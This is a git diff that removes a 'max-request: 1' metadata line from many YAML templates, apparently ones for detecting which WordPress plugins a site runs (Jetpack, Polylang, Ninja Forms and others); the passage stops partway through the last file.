diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 4ecac0cd92..8d7e45818b 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/hello-dolly/
metadata:
- max-request: 1
plugin_namespace: hello-dolly
wpscan: https://wpscan.com/plugin/hello-dolly
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index e50f58cef8..ed3967db7b 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/host-webfonts-local/
metadata:
- max-request: 1
plugin_namespace: host-webfonts-local
wpscan: https://wpscan.com/plugin/host-webfonts-local
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 031bb48563..2ff5adba86 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/imagify/
metadata:
- max-request: 1
plugin_namespace: imagify
wpscan: https://wpscan.com/plugin/imagify
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 3cdcf3da93..9099f3c0a5 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/imsanity/
metadata:
- max-request: 1
plugin_namespace: imsanity
wpscan: https://wpscan.com/plugin/imsanity
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index c222bc9d4a..1ee0e67542 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/insert-headers-and-footers/
metadata:
- max-request: 1
plugin_namespace: insert-headers-and-footers
wpscan: https://wpscan.com/plugin/insert-headers-and-footers
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index c8acf8c625..43cb2ab09c 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/instagram-feed/
metadata:
- max-request: 1
plugin_namespace: instagram-feed
wpscan: https://wpscan.com/plugin/instagram-feed
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 66b7d6a363..7ba81036cf 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/intuitive-custom-post-order/
metadata:
- max-request: 1
plugin_namespace: intuitive-custom-post-order
wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index a36016562d..24fc3e3295 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/iwp-client/
metadata:
- max-request: 1
plugin_namespace: iwp-client
wpscan: https://wpscan.com/plugin/iwp-client
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e4017b1a0a..e701e365ba 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/jetpack/
metadata:
- max-request: 1
plugin_namespace: jetpack
wpscan: https://wpscan.com/plugin/jetpack
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index 53d6d393bd..c0cc5400a8 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/kadence-blocks/
metadata:
- max-request: 1
plugin_namespace: kadence-blocks
wpscan: https://wpscan.com/plugin/kadence-blocks
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index c286e9a14f..22687bcffe 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/kirki/
metadata:
- max-request: 1
plugin_namespace: kirki
wpscan: https://wpscan.com/plugin/kirki
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index 364e3cd71e..b69d3d5bfe 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/leadin/
metadata:
- max-request: 1
plugin_namespace: leadin
wpscan: https://wpscan.com/plugin/leadin
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 4fcccbfc33..7975a57702 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/limit-login-attempts-reloaded/
metadata:
- max-request: 1
plugin_namespace: limit-login-attempts-reloaded
wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index 3fbc714d3b..ff4cef94d7 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/limit-login-attempts/
metadata:
- max-request: 1
plugin_namespace: limit-login-attempts
wpscan: https://wpscan.com/plugin/limit-login-attempts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index c49b506979..a8903697b0 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/litespeed-cache/
metadata:
- max-request: 1
plugin_namespace: litespeed-cache
wpscan: https://wpscan.com/plugin/litespeed-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index dfcaf6f71b..3f141c4476 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/loco-translate/
metadata:
- max-request: 1
plugin_namespace: loco-translate
wpscan: https://wpscan.com/plugin/loco-translate
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 61be246fee..5355e988a2 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/loginizer/
metadata:
- max-request: 1
plugin_namespace: loginizer
wpscan: https://wpscan.com/plugin/loginizer
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml
index 1c16a72d76..6f06b49011 100644
--- a/http/technologies/wordpress/plugins/loginpress.yaml
+++ b/http/technologies/wordpress/plugins/loginpress.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/loginpress/
metadata:
- max-request: 1
plugin_namespace: loginpress
wpscan: https://wpscan.com/plugin/loginpress
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 50d2e6630b..53d409fb68 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/mailchimp-for-woocommerce/
metadata:
- max-request: 1
plugin_namespace: mailchimp-for-woocommerce
wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 8d71f7bde9..0e908a9580 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/mailchimp-for-wp/
metadata:
- max-request: 1
plugin_namespace: mailchimp-for-wp
wpscan: https://wpscan.com/plugin/mailchimp-for-wp
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index 5e1f97086e..aeb1875c57 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/mailpoet/
metadata:
- max-request: 1
plugin_namespace: mailpoet
wpscan: https://wpscan.com/plugin/mailpoet
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index d87d456a8c..7c15702305 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/maintenance/
metadata:
- max-request: 1
plugin_namespace: maintenance
wpscan: https://wpscan.com/plugin/maintenance
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index aa9153241e..5ce87e6c71 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/mainwp-child/
metadata:
- max-request: 1
plugin_namespace: mainwp-child
wpscan: https://wpscan.com/plugin/mainwp-child
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index 09641796a3..c342e6b45a 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/malcare-security/
metadata:
- max-request: 1
plugin_namespace: malcare-security
wpscan: https://wpscan.com/plugin/malcare-security
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index 28b70d09bf..e95041f555 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/megamenu/
metadata:
- max-request: 1
plugin_namespace: megamenu
wpscan: https://wpscan.com/plugin/megamenu
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index b43c10ed7a..879a0d1c12 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/members/
metadata:
- max-request: 1
plugin_namespace: members
wpscan: https://wpscan.com/plugin/members
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index eb7e78bc7f..985f5d373a 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/meta-box/
metadata:
- max-request: 1
plugin_namespace: meta-box
wpscan: https://wpscan.com/plugin/meta-box
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 8881e23860..8e1cb46cf0 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ml-slider/
metadata:
- max-request: 1
plugin_namespace: ml-slider
wpscan: https://wpscan.com/plugin/ml-slider
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7a58c58f63..7e3e4e2d7e 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/newsletter/
metadata:
- max-request: 1
plugin_namespace: newsletter
wpscan: https://wpscan.com/plugin/newsletter
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 5f99b8cac8..17ea142c46 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/nextend-facebook-connect/
metadata:
- max-request: 1
plugin_namespace: nextend-facebook-connect
wpscan: https://wpscan.com/plugin/nextend-facebook-connect
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index b08876df04..953e4ab3d8 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/nextgen-gallery/
metadata:
- max-request: 1
plugin_namespace: nextgen-gallery
wpscan: https://wpscan.com/plugin/nextgen-gallery
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 3f68dffe06..92107fa69c 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ninja-forms/
metadata:
- max-request: 1
plugin_namespace: ninja-forms
wpscan: https://wpscan.com/plugin/ninja-forms
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 34f9bde1d6..5e1fe4ef5c 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ocean-extra/
metadata:
- max-request: 1
plugin_namespace: ocean-extra
wpscan: https://wpscan.com/plugin/ocean-extra
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index d9f645328f..74fb3e6010 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/official-facebook-pixel/
metadata:
- max-request: 1
plugin_namespace: official-facebook-pixel
wpscan: https://wpscan.com/plugin/official-facebook-pixel
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index 8a1196fc9f..b9f70ba555 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/one-click-demo-import/
metadata:
- max-request: 1
plugin_namespace: one-click-demo-import
wpscan: https://wpscan.com/plugin/one-click-demo-import
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 05025452b7..6486c02c9a 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/optinmonster/
metadata:
- max-request: 1
plugin_namespace: optinmonster
wpscan: https://wpscan.com/plugin/optinmonster
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 0bc823830f..c45ef4bf89 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/otter-blocks/
metadata:
- max-request: 1
plugin_namespace: otter-blocks
wpscan: https://wpscan.com/plugin/otter-blocks
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index dafe6974f6..3743307dbc 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/password-protected/
metadata:
- max-request: 1
plugin_namespace: password-protected
wpscan: https://wpscan.com/plugin/password-protected
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index ba05fb1e16..a4c6980041 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/pdf-embedder/
metadata:
- max-request: 1
plugin_namespace: pdf-embedder
wpscan: https://wpscan.com/plugin/pdf-embedder
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml
index 7fbeea5917..a224d85727 100644
--- a/http/technologies/wordpress/plugins/photo-gallery.yaml
+++ b/http/technologies/wordpress/plugins/photo-gallery.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/photo-gallery/
metadata:
- max-request: 1
plugin_namespace: photo-gallery
wpscan: https://wpscan.com/plugin/photo-gallery
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index 7f98d822a8..adf3387ddb 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/pixelyoursite/
metadata:
- max-request: 1
plugin_namespace: pixelyoursite
wpscan: https://wpscan.com/plugin/pixelyoursite
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index 89602f4264..eb6e1aaa5d 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/polylang/
metadata:
- max-request: 1
plugin_namespace: polylang
wpscan: https://wpscan.com/plugin/polylang
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index 2f6513ca42..b3c83cd0bf 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/popup-builder/
metadata:
- max-request: 1
plugin_namespace: popup-builder
wpscan: https://wpscan.com/plugin/popup-builder
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 982306b13c..96d8bd6aca 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/popup-maker/
metadata:
- max-request: 1
plugin_namespace: popup-maker
wpscan: https://wpscan.com/plugin/popup-maker
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index fdcac13b56..85955ac95e 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/post-smtp/
metadata:
- max-request: 1
plugin_namespace: post-smtp
wpscan: https://wpscan.com/plugin/post-smtp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index 829edad042..56d2e4efcd 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/post-types-order/
metadata:
- max-request: 1
plugin_namespace: post-types-order
wpscan: https://wpscan.com/plugin/post-types-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index 975b63f5de..d9c6052cd7 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/premium-addons-for-elementor/
metadata:
- max-request: 1
plugin_namespace: premium-addons-for-elementor
wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index 5065659e82..afc1141e0c 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/pretty-link/
metadata:
- max-request: 1
plugin_namespace: pretty-link
wpscan: https://wpscan.com/plugin/pretty-link
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index 732ffbc4eb..d44add9ca6 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/really-simple-captcha/
metadata:
- max-request: 1
plugin_namespace: really-simple-captcha
wpscan: https://wpscan.com/plugin/really-simple-captcha
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 12dffeb534..20ba5c2e16 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/really-simple-ssl/
metadata:
- max-request: 1
plugin_namespace: really-simple-ssl
wpscan: https://wpscan.com/plugin/really-simple-ssl
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index ae0e76c4bb..cbcf3cf09d 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/redirection/
metadata:
- max-request: 1
plugin_namespace: redirection
wpscan: https://wpscan.com/plugin/redirection
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index b1718d1ccb..3311d42c94 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/redux-framework/
metadata:
- max-request: 1
plugin_namespace: redux-framework
wpscan: https://wpscan.com/plugin/redux-framework
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 7543ac1d55..46c1c22805 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/regenerate-thumbnails/
metadata:
- max-request: 1
plugin_namespace: regenerate-thumbnails
wpscan: https://wpscan.com/plugin/regenerate-thumbnails
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 4a29cecdb0..7c13b8d2a4 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/safe-svg/
metadata:
- max-request: 1
plugin_namespace: safe-svg
wpscan: https://wpscan.com/plugin/safe-svg
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index be281d91e6..53b30ba721 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/seo-by-rank-math/
metadata:
- max-request: 1
plugin_namespace: seo-by-rank-math
wpscan: https://wpscan.com/plugin/seo-by-rank-math
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 6bd95ec077..9555d7aebd 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/sg-cachepress/
metadata:
- max-request: 1
plugin_namespace: sg-cachepress
wpscan: https://wpscan.com/plugin/sg-cachepress
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 1fd64a5279..180266f448 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/sg-security/
metadata:
- max-request: 1
plugin_namespace: sg-security
